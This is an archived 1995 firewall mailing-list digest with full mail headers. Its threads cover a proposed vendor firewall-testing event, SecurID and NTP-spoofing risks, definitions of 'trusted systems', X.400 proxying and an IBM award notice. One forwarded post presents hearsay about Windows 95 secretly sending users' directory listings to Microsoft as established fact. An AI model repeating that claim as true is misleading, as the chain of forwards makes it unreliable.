firewalls-outgoing; Tue, 1 Aug 1995 09:59:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA04749 for ; Tue, 1 Aug 1995 09:59:02 -0700 Message-Id: <199508011659.JAA04749@miles.greatcircle.com> Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma004711; Tue Aug 1 09:58:06 1995 Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA185566166; Wed, 2 Aug 1995 02:56:06 +1000 From: Darren Reed Subject: Re: sidewinder challenge To: craiga@Ipsilon.COM (Craig Anderson) Date: Wed, 2 Aug 1995 02:56:06 +1000 (EST) Cc: mjr@iwi.com, ray@skypoint.com, firewalls@greatcircle.com In-Reply-To: <199508010155.SAA05111@servo.ipsilon.com> from "Craig Anderson" at Jul 31, 95 06:55:32 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1024 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Craig Anderson, sie said: > [Marcus Ranum here...] > > Rather than see "take a blindfolded shot at the system" > > firewalls tests, I'd rather see: "here is a detail of our design, > > take it and study the exact configuration you will be attacking > > and come back in a week with testing tools" approach. Anything > > else is security through obscurity, and hopefully we've learned > > that that's not very good. Can anyone disagree ? > So how about doing the Firewall industry equivalent of the NFS industries > week-long Inter-Op conference. No marketing weenies allowed, just technical > people from each participating vendor attacking each others machines to > help improve the industry. No technical results will be published. > If some vendor just wants free development help, don't help. Just > point out to each other the weaknesses found. As long as they don't mind a few of us who have non-commercial but otherwise the same intrests coming along, it'd be a good thing, I think. darren From firewalls-owner Tue Aug 1 11:57:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03810 for firewalls-outgoing; Tue, 1 Aug 1995 09:33:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03792 for ; Tue, 1 Aug 1995 09:33:45 -0700 Received: from freeside.fc.net(198.6.198.2) by miles via smap (V1.3) id sma003788; Tue Aug 1 09:33:21 1995 Received: from garrison.com (Ugarison@localhost) by freeside.fc.net (8.6.12/8.6.6) with UUCP id LAA03080; Tue, 1 Aug 1995 11:10:33 -0500 Received: by garrison.com (4.1/SMI-4.1) id AA00357; Tue, 1 Aug 95 10:56:11 CDT Date: Tue, 1 Aug 95 10:56:11 CDT From: root@garrison.com (Operator) Message-Id: <9508011556.AA00357@garrison.com> To: firewalls@greatcircle.com, vin@shore.net Subject: Re: Secure- ID and NTP vulnerabilities Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks for the info in reguards to Secure-ID & NTP Vulerabilities. I was wondering if you could address one of my, and my customers, concerns in reguards to the keys themselves. Several months ago, someone has posted information in reguards to SDI. They had stated that the 'pin#' was being sent plaintext, across the wire, as part of the 1-time password scheme. Is still still true, or was it ever? I have heard this problem exists with only certain cards (I believe the ones that don't have the pin#'s in order to access the card). Could you speak on this briefly? Since the cards are distributed from SDI with unique qualities (the serial numbers), a disgruntled (sp!?) employee @ SDI, who knows the encryption algorythm could breach security @ any customer site. With the knowledge of the 'pin' of the card, the seed information (the unique qualifier of the card), & encryption algorythm in hand, the attacker could caculate what the password would be at a given time. I would assume that SDI had thought about this, and has somehow addressed the issue. To put me, as well as many others people's minds at rest, I would greatly appreciate hearing from you. Jeromie Jackson Garrison Associates jeromie@garrison.com ---- Standard Disclaimer Applies ---- From firewalls-owner Tue Aug 1 12:01:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05282 for firewalls-outgoing; Tue, 1 Aug 1995 10:15:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05274 for ; Tue, 1 Aug 1995 10:15:03 -0700 Received: from nic.abii.com(204.77.143.1) by miles via smap (V1.3) id sma005269; Tue Aug 1 10:14:29 1995 Received: (from mail@localhost) by nic.abii.com (8.6.12/8.6.11) id MAA27151 for ; Tue, 1 Aug 1995 12:13:30 -0500 Received: from mailserv.abii.com(204.77.144.103) by nic.abii.com via smap (V1.3) id sma027097; Tue Aug 1 12:13:04 1995 Received: by mailserv.abii.com with Microsoft Mail id <301E7C91@mailserv.abii.com>; Tue, 01 Aug 95 12:12:17 PDT From: Garry Garrett To: "'firewalls list from GreatCircle'" Subject: RE: multilevel security in firewalls Date: Tue, 01 Aug 95 12:11:00 PDT Message-ID: <301E7C91@mailserv.abii.com> Encoding: 18 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Newbie alert! Okay, I've seen the term "trusted system" bantered around. Can someone give me a quick explaination of what a trusted system is? Is this a term coined by some government security standard (like the "orange book", whatever that is [that's where this A1, B1, C2 standards come from, right?]). I've seen references to trusted systems in "Practical Unix Security", a book I looked over and passed over in the bookstore because it was very dated and very BSD slanted (and I mostly to SYS V these days). I'm not sure that what they are calling a "trusted system" is the same thing to which you are refering. Maybe this can be added to the FAQ's "Glossary of firewall related terms" section? Garry From firewalls-owner Tue Aug 1 12:38:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09508 for firewalls-outgoing; Tue, 1 Aug 1995 11:30:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09491 for ; Tue, 1 Aug 1995 11:30:39 -0700 Received: from unknown(204.73.26.1) by miles via smap (V1.3) id sma009419; Tue Aug 1 11:29:39 1995 Received: from notes.mdor.state.mn.us by mail.state.mn.us; Tue, 1 Aug 95 13:14:10 -0500 Received: by notes.mdor.state.mn.us (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA4464; Tue, 01 Aug 95 13:27:30 -0700 Message-Id: <9508012027.AA4464@notes.mdor.state.mn.us> Received: from RISD with "Lotus Notes Mail Gateway for SMTP" id 9C4EF4335D00BFA18625620B006551BB; Tue, 1 Aug 95 13:27:30 To: firewalls From: Eric Pederson Date: 1 Aug 95 13:26:41 EDT Subject: NetSp wins Trust Award Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following information was forwarded to me by pro-IBM guy. I'd appreciate comments from the list on both NetSP and the relavence of the announcement. Thanks, eric -------- SOMERS, N.Y., July 31, 1995--IBM's Resource Access Control Facility (RACF) and NetSP Secured Logon Coordinator were recently named as winners in two categories of the InfoSecurity News Readers' Trust Awards. The magazine's readers selected NetSP as the best network security product and RACF as the best platform security product in the awards announced in the May/June issue. Readers were asked to choose which product in each of 16 categories they trust the most. "These awards represent the opinions of information-security professionals who use these products in real-life situations," said Michael I. Sobol, InfoSecurity News publisher. "Our 28,000 readers know more about the technology and the products than anyone. These are the first awards to give the real experts in information security--our readers--a chance to name their favorite products." From firewalls-owner Tue Aug 1 13:01:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09789 for firewalls-outgoing; Tue, 1 Aug 1995 11:35:50 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09729 for ; Tue, 1 Aug 1995 11:35:40 -0700 Received: from sunthing.sjsinc.com(140.174.165.1) by miles via smap (V1.3) id sma009699; Tue Aug 1 11:34:53 1995 Received: by sunthing.sjsinc.com Mailer: sendmail (8.6.12/8.6.9) Protocol: Id: LAA12779; Tue, 1 Aug 1995 11:33:07 -0700 Date: Tue, 1 Aug 1995 11:33:07 -0700 From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) Message-Id: <199508011833.LAA12779@sjsinc.com> To: firewalls@greatcircle.com Subject: Huge gapping hole in Win95 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks: 1). Please see the posting below my sig line from comp.risks 2). I can imagine the following scenario: - "*user*" thrilled with his new upgrade to Win95 runs out to Fry's, Egghead...and buys a modem unbeknownst to the security types. - computer is also running a TCP/IP stack and PCNFS to access all of the corporate resources behind the firewall. - "*user*" fires up MS-Network which then transmits the entire corporate filesystem topology to MicroSoft. - security types never know that internal information has been severely compromised. 3). Am I wrong here??? I find the potential for this scenario both realistic and horrifying!!!! 4). In addition to the security implications, this might actually be a way to tame the MS beast...if enough corporations get probbed in this manner, the lawyers will have lots of fun putting together a class-action lawsuit to make MS (the original home of proprietary information and disclosures) much, much poorer for stealing tradesecrets, copyrights, etc....ALAS...I love it.... 5). I think this also has implications for the MS TCP/IP port discussion that has been going on on this list recently. I.e., as the article points out, if they have your filesystem structure and you are not blocking that port, they could grab any file that they want and you would never know it... Regards, b c++'ing u, %-) sjs ------------------------------------------------------------------------------- Stefan Jon Silverman - President SJS Associates, N.A., Inc. 572 Chestnut Street Distributed Systems Architecture & Implementation San Francisco, Ca. 94133 Phone: 415 989 2741 E-mail: sjs@sjsinc.com Cell: 415 519 3494 ------------------------------------------------------------------------------- Weebles wobble, but they don't fall down!!! ------------------------------------------------------------------------------- Date: 30 Jun 1995 07:47:48 U From: "Paul Saffo" Subject: Warning on Using Win95 >From PLS_MCI_MAIL FWD>>Warning on Using Win95 Date: 6/26/95 8:44 PM From: jbreyer@accel.com Subject: Warning on Using Win95 [Update on RISKS-17.13 item] Believe it or not, this is not Net humor but serious. It would otherwise be outstanding satire! Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week Microsoft officials confirm that beta versions of Windows 95 include a small viral routine called Registration Wizard. It interrogates every system on a network gathering intelligence on what software is being run on which machine. It then creates a complete listing of both Microsoft's and competitors' products by machine, which it reports to Microsoft when customers sign up for Microsoft's Network Services, due for launch later this year. "In Short" column, page 88, _Information Week_ magazine, May 22,1995 The implications of this action, and the attitude of Microsoft to plan such action, beggars the imagination. An update on this. A friend of mine got hold of the beta test CD of Win95, and set up a packet sniffer between his serial port and the modem. When you try out the free demo time on The Microsoft Network, it transmits your entire directory structure in background. This means that they have a list of every directory (and, potentially every file) on your machine. It would not be difficult to have something like a FileRequest from your system to theirs, without you knowing about it. This way they could get ahold of any juicy routines you've written yourself and claim them as their own if you don't have them copyrighted. Needless to say, I'm rather annoyed about this. So spread the word as far and wide as possible: Steer clear of Windows 95. = There's nothing to say that this "feature" will be removed in the final release. [GML addition: Prodigy was accused of doing something similar several years ago. In that case it was not nearly as threatening due to: 1) it was = limited to a single PC, 2) Prodigy couldn't do much with the info (i.e. they could not pursue you for copyright infringement, nor were they trying to expand into so many businesses the way Microsoft is).] From firewalls-owner Tue Aug 1 13:15:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA12687 for firewalls-outgoing; Tue, 1 Aug 1995 12:55:08 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA12648 for ; Tue, 1 Aug 1995 12:55:03 -0700 Received: from hatteras.ch.inri.com(198.202.184.13) by miles via smap (V1.3) id sma012631; Tue Aug 1 12:54:37 1995 Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id PAA06109 for ; Tue, 1 Aug 1995 15:55:11 -0400 Date: Tue, 1 Aug 1995 15:55:11 -0400 Message-Id: <199508011955.PAA06109@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: wbunting@ch.inri.com (Bill Bunting) Subject: Protecting X.400 anyone? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone answer some/all of the following about X.400 in a firewalled environment. * What are the best methods to protect X.400 and X.500? * What is the best source of information on the WWW about X.400/X.500 and how it relates to firewalls? * Do you use a proxy for X.400, something like SMAP, or what? * What is the comms flow for X.400 using TCP/IP i.e. ports in use and protocol information? (where is this best documented [RFC ####, http:####] ? * Is there any freeware or public domain source code available to protect X.400/X.500? * Does anyone have any experience they would like to share about X.400/X.500? * If I should have to develop and X.400 proxy/protector which public domain implementation of X.400/X.500 (source code) is available/best? Thank you, -Bill. --------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | --------------------------------------- From firewalls-owner Tue Aug 1 13:30:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13763 for firewalls-outgoing; Tue, 1 Aug 1995 13:27:16 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13732 for ; Tue, 1 Aug 1995 13:27:11 -0700 Received: from northshore.ecosoft.com(192.233.85.129) by miles via smap (V1.3) id sma013723; Tue Aug 1 13:26:48 1995 Received: from [198.115.179.221] (slip-3-21.shore.net) by northshore.ecosoft.com with SMTP id AA09237 (5.67a/IDA-1.5 for ); Tue, 1 Aug 1995 16:25:40 -0400 Message-Id: <199508012025.AA09237@northshore.ecosoft.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 1 Aug 1995 16:27:24 -0500 To: firewalls@greatcircle.com From: vin@shore.net (Vin McLellan) Subject: Re: SecurID & NTP vulnerabilities Cc: verber@parc.xerox.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk (My apologies to the List and Mark Verber. Half my response to his comments about ACE/SecurId and NTP spoofing, below, was somehow cut from my earlier post. -vbm) Mark Verber jumped in to toss a few jabs at SDI: > Security Dynamics does nothing to assure your clock is correct. If your > time is compromised via NTP you are hosed. It is true that the integrity and security of the CPU that hosts the authentication server is the responsibility of the SysAdmin, rather that SDI. But again, ACE "boxes" can't use NTP; and ACE/Servers don't need NTP. The ACE/Server is designed to limit the repercussions of a less than totally secure set-up to denial of service. For years, SDI engineers have toyed with the idea of a secure software clock integral to the ACE/Server code, but the spoof threat has not been deemed serious enough to warrant such an extension. Denial of service is the universal risk. Acts of God; a Luddite employee; or a squirrel on the power line could knock you off-line. Worry about it all, of course -- not least, some error buried among the thousand variables in system and network set-ups -- but realistically, threats have to be ranked for proportional and rational countermeasures. SDI's feeling is: There are easier ways to knock most systems off the Net than by NTP spoofing. Even if someone has illicitly gained root on the machine that hosts a ACE/Server, messing with the system clock is a torturously round-about way of disabling SecurID access, when crashing your system does it neatly. > If fact, not only to you create an immediate denial of service, but you > also create a hassle for any user who tried to authenticate while the time > was off because those account are marked to require the next login to do > a double verify, eg they have to send the current card display, and then > the next display of the card as soon as it rolls over. This is a bother > Ok, it's a bother -- but it is also an easy and utterly secure way to allow users to recover from this or several other host or card-based problems which can temporarily throw the integrity of the ACE/SecurID authentication exchange in doubt. > and anyone who has scripted remote dialup, etc using SecurID most > likely has not scripted for the second code to be sent. Maybe you didn't script for a (generally transparent) second validation query, but thousands of firms that worked directly with SDI to set up their SecurID systems usually did. It's not hard. It's also standard code for the 100-odd vendor firms that are currently working with SDI to provide API links to ACE off a huge variety of client/server apps. (It is true, however, that for years SDI sold SecurID against the two-cycle challenge/response OTP tokens at least partially on the basis that SecurID authentication could be painless integrated into an established network -- with the piggybacked SecurID card-code and user PIN used in place of the static password. Hopefully, most of those sites eventually upgraded their network protocols.) Apologies to all for the partial repost. Corrections, comments, or questions are always welcome. (Particularly if I can use them in the SecurID FAQ I'm to write for SDI.) Suerte, _Vin -- -- -- -- -- -- -- -- -- -- Vin McLellan The Privacy Guild 53 Nichols St. Chelsea, MA 02150, USA Tel. (617) 884-5548 ===================================================== From firewalls-owner Tue Aug 1 13:51:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11717 for firewalls-outgoing; Tue, 1 Aug 1995 12:36:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11654 for ; Tue, 1 Aug 1995 12:36:48 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma011641; Tue Aug 1 12:36:30 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id MAA09616; Tue, 1 Aug 1995 12:30:57 -0700 Received: from unknown(199.86.32.7) by mycroft via smap (V1.3mjr) id sma009612; Tue Aug 1 12:30:41 1995 Received: from [199.86.33.19] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0sdMmf-0001dwC; Tue, 1 Aug 95 14:15 CDT X-Sender: ray@skypoint.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 1 Aug 1995 14:17:50 -0500 To: mulligan@future.incog.com From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: sidewinder challenge Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mulligan@future.incog.com writes: >Just to be clear, it isn't Interop, but Connectithon. At Interop these >days there seems to be nothing but marketing weenies and marketing hype. >Connectithon only allows a single part of day for media and technical >results ARE NOT published. Maybe we could see if we could do a firewall >test-a-thon with Connectithon. If there is interest, I can ask the >right folks in Sun. How can I (we) help? RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Tue Aug 1 14:23:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11810 for firewalls-outgoing; Tue, 1 Aug 1995 12:38:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11752 for ; Tue, 1 Aug 1995 12:37:50 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma011730; Tue Aug 1 12:37:00 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id MAA09631; Tue, 1 Aug 1995 12:31:26 -0700 Received: from unknown(199.86.32.7) by mycroft via smap (V1.3mjr) id sma009622; Tue Aug 1 12:31:15 1995 Received: from [199.86.33.19] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0sdMmZ-0001fyC; Tue, 1 Aug 95 14:15 CDT X-Sender: ray@skypoint.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 1 Aug 1995 14:17:44 -0500 To: firewalls@greatcircle.com From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: I open my big mouth... proxies for Oracle? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ummm, at the risk of sounding like I've made firewalls my own private hang out... Wonder if anyone has used the various alternatives available in Oracle's security interface. I hear that my ex-employer (CyberSAFE) is offering a Kerberos hook for what appears to be Oracle's generalized secuirty interface? RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Tue Aug 1 14:43:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15295 for firewalls-outgoing; Tue, 1 Aug 1995 14:10:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15215 for ; Tue, 1 Aug 1995 14:10:19 -0700 Received: from aspensys.aspensys.com(198.77.70.104) by miles via smap (V1.3) id sma015193; Tue Aug 1 14:09:23 1995 Received: from smtpinet.aspensys.com by aspensys (5.0/SMI-SVR4) id AA24378; Tue, 1 Aug 1995 17:05:26 +0500 Received: from cc:Mail by smtpinet.aspensys.com id AA807322248 Tue, 01 Aug 95 17:10:48 EST Date: Tue, 01 Aug 95 17:10:48 EST From: jmeritt@smtpinet.aspensys.com (Meritt, Jim) Message-Id: <9507018073.AA807322248@smtpinet.aspensys.com> Cc: firewalls@greatcircle.com Subject: Re: proving secure content-length: 134 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Air gap works REAL well. But folks keep wanting unsecure stuff like "communications" at the same time. Ah well.... From firewalls-owner Tue Aug 1 14:44:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13236 for firewalls-outgoing; Tue, 1 Aug 1995 13:11:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13197 for ; Tue, 1 Aug 1995 13:11:03 -0700 Received: from lobster.wellfleet.com(192.32.253.3) by miles via smap (V1.3) id sma013171; Tue Aug 1 13:10:09 1995 Received: from paperboy.wellfleet.com by lobster.wellfleet.com (4.1/SMI-4.1) id AA06513; Tue, 1 Aug 95 16:07:50 EDT Received: from BayNetworks.com by paperboy.wellfleet.com (4.1/SMI-4.1) id AA21513; Tue, 1 Aug 95 16:09:06 EDT From: Gateway@BayNetworks.com (Gateway) Reply-To: Gateway@BayNetworks.com To: Firewalls@GreatCircle.COM Subject: NDN: Firewalls-Digest V4 #455 Date: 01 Aug 1995 20:09:01 GMT Message-Id: <471728126.52609184@BayNetworks.com> Organization: Bay Networks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry. Your message could not be delivered: Message contained no valid addresses. From firewalls-owner Tue Aug 1 15:18:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15035 for firewalls-outgoing; Tue, 1 Aug 1995 14:03:22 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15013 for ; Tue, 1 Aug 1995 14:03:18 -0700 Received: from foobar.ipsilon.com(204.160.241.205) by miles via smap (V1.3) id sma015004; Tue Aug 1 14:03:10 1995 Received: from localhost.ipsilon.com (localhost.ipsilon.com [127.0.0.1]) by servo.ipsilon.com (8.6.11/8.6.10) with SMTP id OAA17458; Tue, 1 Aug 1995 14:00:12 -0700 Message-Id: <199508012100.OAA17458@servo.ipsilon.com> X-Authentication-Warning: servo.ipsilon.com: Host localhost.ipsilon.com didn't use HELO protocol X-Mailer: exmh version 1.6beta 3/23/95 To: mulligan@incog.com cc: Craig Anderson , mjr@iwi.com, ray@skypoint.com, firewalls@greatcircle.com, craiga@Ipsilon.COM Subject: Re: sidewinder challenge In-reply-to: Your message of "Mon, 31 Jul 1995 22:18:28 MDT." <9508010418.AA05240@future.incog.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 01 Aug 1995 14:00:11 -0700 From: Craig Anderson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yes, Connectathon is what I meant (must have been a brain-fade). All you guys in the industry should welcome this. There is entirely TOO much FUD in this business. That's why people want source code, because they can't trust a vendor. And it's awfull hard to be the "only" trustworthy vendor. So you should figure out how to be trustworthy as a group. Publish who participated in the Firewall Connectathon and make it a gold star for those who do. Come on folks, put up or shut up. Craig Anderson > > So how about doing the Firewall industry equivalent of the NFS industries > > week-long Inter-Op conference. No marketing weenies allowed, just technical > > people from each participating vendor attacking each others machines to > > help improve the industry. No technical results will be published. > > If some vendor just wants free development help, don't help. Just > > point out to each other the weaknesses found. > > Just to be clear, it isn't Interop, but Connectithon. At Interop these > days there seems to be nothing but marketing weenies and marketing hype. > Connectithon only allows a single part of day for media and technical > results ARE NOT published. Maybe we could see if we could do a firewall > test-a-thon with Connectithon. If there is interest, I can ask the > right folks in Sun. > > geoff > From firewalls-owner Tue Aug 1 15:20:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13179 for firewalls-outgoing; Tue, 1 Aug 1995 13:10:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13138 for ; Tue, 1 Aug 1995 13:10:03 -0700 Received: from kant.newsedge.com(192.206.82.2) by miles via smap (V1.3) id sma013127; Tue Aug 1 13:09:54 1995 Received: from herne.newsedge.com by newsedge.com (4.1/SMI-4.1) id AA13896; Tue, 1 Aug 95 16:04:53 EDT Date: Tue, 1 Aug 95 16:11:45 EST Message-Id: <9508011611.AA14296@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: Subject: RE: multilevel security in firewalls X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In reply to: > > >Newbie alert! > >Okay, I've seen the term "trusted system" bantered around. Can >someone give me a quick explaination of what a trusted system is? A trusted system is *usually* another system you have identified (typically by IP address) to have access to your system without requiring a password. A good example would be if you have two systems (A&B) that you typically work off of and you are the only user of both systems, you may want to set each up as a "trusted host" to the other("A" is trusted by "B" and "B" is trusted by "A"). This way you only have to login once and have access to both systems. The problem is if someone else "borrowes" your IP address (say from system "A") they will be asumed to be a trusted system and have access (in this example to system "B") with requiring a password. From firewalls-owner Tue Aug 1 15:21:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13411 for firewalls-outgoing; Tue, 1 Aug 1995 13:14:18 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13342 for ; Tue, 1 Aug 1995 13:14:06 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma013296; Tue Aug 1 13:13:51 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA14107; Tue, 1 Aug 95 15:47:38 -0400 Date: Tue, 1 Aug 95 15:47:37 -0400 Message-Id: <9508011947.AA14107@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: "Trusted Computers" (was re: multilevel security) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Garry rites: >Okay, I've seen the term "trusted system" bantered around. Can >someone give me a quick explaination of what a trusted system is? Well it has a lot of meanings. In the red book (Trusted Network Interpretation, NCSC-TG-005) page 274 we find: "Trusted computer system - a system that employs sufficient hardware and software integrity measures to allow its use for processing simultaneously a range of sensitive or classified information." I tend to use "trusted hosts" and "trusted subnets" a bit differently: "Those machines (or collection of machines on a subnet) which employ sufficient hardware, software, and trained personnel to be able to enforce the security policies of the Enterprise without other assistance." "Trusted hosts" may only connect to a "trusted subnet" and all nodes on a "trusted subnet" must be "trusted". For example if a contract is let which requires RPC access to a program then if another means cannot be found, a "trusted" subnet is created with a filtered connection to the internal net and the firewall is ACLed to allow connection from specific "untrusted" outside hosts to a "trusted" node on that subnet only. "Trusted" nodes require a designated custodian who has received special training both on the node and on "trust" and are subject to unannounced monitoring/auditing. The rationale being that a properly equipped/maintained machine can be expected to enforce the security policies of the Enterprise as well as any device on the firewall. This leads to the question of "what is an untrusted subnet ?" and that is simply the "soft chewey center" of machines that are not expected to have to resist attack by themselves. Instead the firewall and internal filters/gateways are intended to provide that protection for the Enterprise or for individual nodes/nets/departments/projects. In B&C this role is handled by the bastien nodes. In my worldview, good channeling, preparation, and administration (with accountability) can permit limited channels of access to specific nodes with minimal risk. Warmly, Padgett From firewalls-owner Tue Aug 1 15:22:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11809 for firewalls-outgoing; Tue, 1 Aug 1995 12:38:00 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11753 for ; Tue, 1 Aug 1995 12:37:51 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma011737; Tue Aug 1 12:37:29 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id MAA09638; Tue, 1 Aug 1995 12:31:56 -0700 Received: from skypoint.com(199.86.32.7) by mycroft via smap (V1.3mjr) id sma009636; Tue Aug 1 12:31:53 1995 Received: from [199.86.33.19] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0sdMn4-0001g4C; Tue, 1 Aug 95 14:15 CDT X-Sender: ray@skypoint.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 1 Aug 1995 14:18:15 -0500 To: mdr@vodka.sse.att.com From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: Using miltilevel systems for firewalls Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark Riggins mdr@vodka.sse.att.com writes: >> >Re: Re: proving secure >> >Mark writes: >> >Okay, so labels and mandatory access control don't have much to do with >> >building a firewall. But I wouldn't throw away my car just because I >> >don't need four-wheel drive. Maybe it's time for an OS with high assurance >> >and no labels? >oops! you quoted Jeff Williams and attributed it to me. I disagree >with Jeff's comment too. Sorry, mailing list ineptitude at work. >Firewalls inherently need separation policies to protect themselves >from the network and applications software that they run. Or, so it seems. Not being into the details of the math, it seems that something simple like set theory demands this. >> 2) Most organizations are more interested in simply "getting that >> connectivity going" than they are in doing >> architecture/design/implmentation that actually meets their security policy >> (be it granular enough or not.) What I commony hear: "Security? Yeah, >> 'gimmie a little 'o that, will ya?" >Sad but true. But the new push for connectivity to the internet may >force companies to take a new look at host level security. I keep hoping so. Wonder if it would do any good to canvas this list and make a press release signed by all who agree: "We, the assembled masses of firewall-interested netfolk, here-by declare that firewalls can't correct host security or organizational culture problems." We could make a press release and even quote SMB, et al ;) RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Tue Aug 1 15:24:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11886 for 